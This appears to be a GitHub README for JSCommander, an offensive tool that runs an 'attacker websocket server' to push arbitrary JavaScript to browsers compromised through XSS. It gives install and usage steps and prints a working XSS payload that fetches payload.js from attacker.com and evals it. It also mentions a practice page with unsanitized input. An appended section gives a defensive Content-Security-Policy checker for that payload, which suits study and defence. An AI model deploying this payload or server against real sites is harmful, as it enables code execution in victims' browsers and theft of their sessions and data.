Remotely send JS to execute on clients that connect to your attacker websocket server via XSS.

intrudir/JSCommander

JSCommander

Issue JS commands remotely when clients connect to your attacker websocket server

Inspired by https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation

Install

python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt

Usage

Run the server

python3 JSCommnder-server.py

The control panel is only accessible from localhost on the machine running the server. It is available at http://localhost:8080/control_panel.html

You can use XSS payloads to connect to the websocket server, e.g.:

<img src="#" onerror='fetch(`http://attacker.com:8081/payload.js`).then(res=>res.text().then(r=>eval(r)))' style="display:none" />

There are 2 testing HTML files to play with.

  • test_client.html simply connects to the websocket server upon opening it in your browser.
  • test_client2.html has an unsanitized input for practicing with XSS payloads.
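
A defender's view of the payload shown above, as an added example that is not part of JSCommander: a simplified Content-Security-Policy check that reports which steps of that payload (inline onerror handler, fetch of payload.js, eval of the response, websocket connection) a given policy header would block. The page origin and websocket port in the sample call are constructed, and source matching is an assumption-level model covering only keywords, scheme sources and exact origins, with no path or wildcard-host matching.

```javascript
// Added example, not JSCommander code. Simplified CSP model (assumption).
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !policy.has(key)) policy.set(key, sources); // first copy of a directive wins
  }
  return policy;
}

// Source list governing an action via its fallback chain; null = nothing applies, so allowed.
function effective(policy, ...chain) {
  for (const name of chain) if (policy.has(name)) return policy.get(name);
  return null;
}

function allowsUrl(sources, url, pageOrigin) {
  if (sources === null) return true;
  const target = new URL(url);
  return sources.some(src => {
    const s = src.toLowerCase();
    if (s === '*') return true;                         // treated as allow-all
    if (s === "'self'") return target.origin === pageOrigin;
    if (s.endsWith(':')) return s === target.protocol;  // scheme source, e.g. https:
    if (s.startsWith("'")) return false;                // 'none', nonces, hashes
    try {
      const full = s.includes('://') ? s : `${target.protocol}//${s}`;
      return new URL(full).origin === target.origin;
    } catch { return false; }
  });
}

// One verdict per step of the payload on this page.
function auditPayloadChain(header, pageOrigin, fetchUrl, wsUrl) {
  const p = parseCsp(header);
  const attr = effective(p, 'script-src-attr', 'script-src', 'default-src');
  const script = effective(p, 'script-src', 'default-src');
  const connect = effective(p, 'connect-src', 'default-src');
  const lacks = (list, kw) => list !== null && !list.some(s => s.toLowerCase() === kw);
  return {
    inlineHandlerBlocked: lacks(attr, "'unsafe-inline'"),
    evalBlocked: lacks(script, "'unsafe-eval'"),
    fetchBlocked: !allowsUrl(connect, fetchUrl, pageOrigin),
    websocketBlocked: !allowsUrl(connect, wsUrl, pageOrigin),
  };
}

// Constructed sample: hypothetical page origin and websocket port.
console.log(auditPayloadChain("default-src 'self'", 'https://app.example',
  'http://attacker.com:8081/payload.js', 'ws://attacker.com:9000'));
```

A policy with no connect-src and no default-src leaves the fetch and websocket steps unrestricted even when script-src is set, which is the gap this check is meant to surface.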
